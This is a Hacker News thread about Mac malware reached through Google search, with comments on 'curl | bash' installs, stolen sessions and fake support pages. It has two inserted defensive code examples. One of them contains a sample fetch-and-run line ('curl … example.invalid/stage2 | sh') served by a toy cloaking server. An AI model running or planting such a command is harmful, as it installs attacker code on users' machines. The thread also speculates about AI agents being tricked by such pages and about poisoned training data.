Hacker News

More Mac malware from Google search

200 points by kristianp yesterday at 8:52 PM | 133 comments

Comments

emilecantin today at 1:32 AM

Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions (e.g. the new "native" Claude Code install)...

Publish through homebrew like a civilized person, please!

ALLTaken today at 4:15 AM

DO NOT GOOGLE EXPRESS VPN!

The GitHub links are some of the nastiest malware I have ever encountered in my life!

It steals your Apple Keychain, all your "Safe" Passkeys, your Google Chrome "Saved Passwords", even your KeePass Database!

Login and security is still not sufficiently solved with attack-proofs for the most important things in life like your Bank, Email, Wallets, Social Logins.

Your "logged-in Sessions" also get stolen! It's unbearable that most cookies expire in months "ON THE SERVER SIDE"! You have no control and can't log the attacker out!

It happened to me, when I was in China and searched for ExpressVPN, because the main website didn't load forever, the GitHub link seemed like an alternative... damn... I changed my Google Password 5 times and the attacker was still able to log in, it was so devastating! I had to change my email passwords multiple times too.

Sessions are what make logins valid and this is the weakest link of all. I wish Sessions used Off-The-Record encryption with One-Time-Pads, such that each access requires a new key, that can only be derived with a valid reply, which ensures that the attacker can be logged out safely.

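The failure ALLTaken describes (a session cookie copied off the machine that stays valid after the password is changed) is a server-side design problem, not something the victim can fix by changing passwords. The following is an added example, not code from the thread or from any real service: a small in-memory account and session store in which a password change or a "sign out everywhere" action bumps a per-account session generation, so every token minted before that point stops validating no matter how long its own expiry is. The user names, the PBKDF2 parameters and the store itself are constructed for this example.

```python
import hashlib
import secrets
import time


class SessionStore:
    """Constructed in-memory store for the example: accounts carry a
    'generation' counter and every session token records the generation
    it was issued under."""

    def __init__(self):
        self.users = {}     # name -> {"salt", "pw_hash", "generation"}
        self.sessions = {}  # token -> {"user", "generation", "expires"}

    @staticmethod
    def _hash(password, salt):
        # PBKDF2 is used here only to keep the example self-contained.
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, name, password):
        salt = secrets.token_bytes(16)
        self.users[name] = {
            "salt": salt,
            "pw_hash": self._hash(password, salt),
            "generation": 0,
        }

    def _check_password(self, name, password):
        u = self.users.get(name)
        return bool(u) and secrets.compare_digest(
            u["pw_hash"], self._hash(password, u["salt"])
        )

    def login(self, name, password, ttl_seconds=30 * 24 * 3600):
        """Issue a random token; a 30-day TTL mirrors the long-lived
        cookies the comment complains about."""
        if not self._check_password(name, password):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = {
            "user": name,
            "generation": self.users[name]["generation"],
            "expires": time.time() + ttl_seconds,
        }
        return token

    def validate(self, token):
        """Return the user name for a live token, else None."""
        s = self.sessions.get(token)
        if s is None or time.time() > s["expires"]:
            return None
        # The key check: a token minted before the last revocation is dead
        # even though its own expiry is still months away.
        if s["generation"] != self.users[s["user"]]["generation"]:
            del self.sessions[token]
            return None
        return s["user"]

    def revoke_all(self, name):
        """'Sign out everywhere': invalidates every existing token at once."""
        self.users[name]["generation"] += 1

    def change_password(self, name, old, new, revoke_sessions=True):
        """revoke_sessions=False reproduces the naive behaviour where a
        password change leaves stolen cookies working."""
        if not self._check_password(name, old):
            return False
        u = self.users[name]
        u["salt"] = secrets.token_bytes(16)
        u["pw_hash"] = self._hash(new, u["salt"])
        if revoke_sessions:
            self.revoke_all(name)
        return True


def stolen_cookie_survives(revoke_sessions):
    """True if a token exfiltrated from the victim's machine still
    validates after the victim changes their password."""
    store = SessionStore()
    store.register("victim", "hunter2")
    stolen = store.login("victim", "hunter2")  # what a stealer would copy
    store.change_password("victim", "hunter2", "correct horse",
                          revoke_sessions=revoke_sessions)
    return store.validate(stolen) is not None


if __name__ == "__main__":
    print("naive store, stolen cookie valid after password change:",
          stolen_cookie_survives(False))
    print("generation-checked store, stolen cookie valid after change:",
          stolen_cookie_survives(True))
```

The generation counter is cheap to store next to the password hash and makes revocation a single increment rather than a scan of every session a user has; the same check works for tokens held in a cookie store on disk, which is exactly what an infostealer copies.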
b1temy today at 2:55 AM

> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,

I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g. reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 link unshortener app.

In any case, there have been malicious sites that return different results based on the headers (e.g. user agent: if it is downloaded with a web browser's user-agent, return a benign script; if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.

> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands

Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long time. I remember Facebook and some other websites used to have a big warning in the developer console, asking users not to paste scripts they found online there, as they are likely scams and will not do what they claim the script would do.

---

Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image (and the image being the same width as the paragraph text), it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
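Both emilecantin's point about `curl | bash` and b1temy's point about user-agent-dependent responses come down to the same check: download the script to a file, look at it, and only then run it. The following is an added example and not code from the thread or from any project it mentions. It stands up a toy loopback server that serves one body to browsers and another to curl-like clients, then fetches the URL under both user agents and compares SHA-256 digests; a mismatch means what you reviewed in the browser is not what `curl | sh` would execute. The server, both script bodies, the user-agent strings and the `example.invalid` second-stage URL (a reserved name that never resolves) are all constructed for this example.

```python
import hashlib
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample bodies. A browser or link-preview tool gets the first;
# a curl-like client gets the second, which pulls a second stage from a
# reserved hostname that never resolves, so nothing is actually fetched.
BENIGN_SCRIPT = b"#!/bin/sh\necho 'Installing ExampleCleaner...'\n"
CLOAKED_SCRIPT = (
    b"#!/bin/sh\necho 'Installing ExampleCleaner...'\n"
    b"curl -fsSL http://example.invalid/stage2 | sh\n"
)

BROWSER_UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
CURL_UA = "curl/8.4.0"


class CloakingHandler(BaseHTTPRequestHandler):
    """Toy cloaking server: picks the body by User-Agent, as the comment describes."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        body = CLOAKED_SCRIPT if ua.startswith("curl/") else BENIGN_SCRIPT
        self.send_response(200)
        self.send_header("Content-Type", "text/x-shellscript")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_server():
    """Bind the toy server on a free loopback port; returns (server, script URL)."""
    srv = HTTPServer(("127.0.0.1", 0), CloakingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/install.sh" % srv.server_address[1]


def fetch(url, user_agent):
    """Download the body under an explicit User-Agent (never piped to a shell)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read()


def check_install_script(url):
    """Fetch the script as a browser and as curl and compare digests.
    Returns (bodies_match, browser_sha256, curl_sha256, curl_body)."""
    as_browser = fetch(url, BROWSER_UA)
    as_curl = fetch(url, CURL_UA)
    browser_digest = hashlib.sha256(as_browser).hexdigest()
    curl_digest = hashlib.sha256(as_curl).hexdigest()
    return browser_digest == curl_digest, browser_digest, curl_digest, as_curl


if __name__ == "__main__":
    srv, url = start_server()
    same, h_browser, h_curl, curl_body = check_install_script(url)
    print("same bytes for browser and curl:", same)
    print("browser sha256:", h_browser)
    print("curl    sha256:", h_curl)
    print("--- what `curl ... | sh` would have executed ---")
    print(curl_body.decode())
    srv.shutdown()
```

Against a real URL the same `fetch`/`check_install_script` pair works unchanged; the point is that the bytes you read are the bytes you run, and that a digest published by the project can be compared against the downloaded file before anything is executed.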

shreyaspapi today at 8:22 AM

This is very close to something that happened to a friend of mine. They were trying to follow a MoltBot installation guide, but clicked on a different link that looked legitimate. That page instructed them to paste a command into Terminal. After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign. But someone who is non-technical might have run with it.

dev_l1x_be today at 8:55 AM

This curl | shell installation is actually insane. It was insane 10 years ago and it is going to be insane 10 years from now. Do not do it.

niek_pas today at 10:45 AM

What is an 'AMOS stealer'?

aucisson_masque yesterday at 10:41 PM

At least macOS has file access permissions.

possibleworlds today at 4:26 AM

I reported one of these recently. It was also related to clearing space, specifically system files. It was the second top sponsored link and presented as an Apple support page. The styling was very convincing, with the only giveaway being the URL.

A day later my parents called me very stressed out about a popup on my mother's iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website that was styled to look like a modal on top of an iOS Settings app page. With the new UI this was extremely effective, as the page title is just a tiny thing down the bottom in the scrolled state.

I don’t know what is going on, but I’d assume the problem is AI moderation.

shevy-java today at 6:47 AM

Google falling from grace. What happened to it? Google Search used to be useful in the past.

sgirard today at 4:52 AM

I imagine that an AI agent like OpenClaw, if given browser access and system control with Peekaboo or similar could easily fall prey to this attack.

tokyobreakfast today at 12:06 AM

Are we still pushing the myth that anti-malware on Mac isn't necessary?

aussieguy1234 today at 3:43 AM

Could the dataset of the LLMs that made these recommendations have been poisoned by, let's say, a Honeypot website specifically designed to cause any LLM that trains on it to recommend malware?

baxtr yesterday at 10:52 PM

Actually… I think this can be solved by AI answers. I don't look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLM.

TminusZ today at 3:15 AM

Careful out there.

retired yesterday at 10:20 PM

Thanks for reminding me to turn off Full Disk Access for Terminal. I'm not sure why I had that one turned on.

tolerance today at 12:13 AM

Another reason to avoid Medium like cold grits.


jeffbee yesterday at 10:38 PM

This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc. purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to open a homedir, it's impossible.

etrvic yesterday at 10:57 PM

A solution would be to stop shipping Macs with the terminal app(s). Computers are now used by a wide variety of people, some without technical knowledge; maybe a default switch on macOS that displays warnings on rather trivial attacks would help.
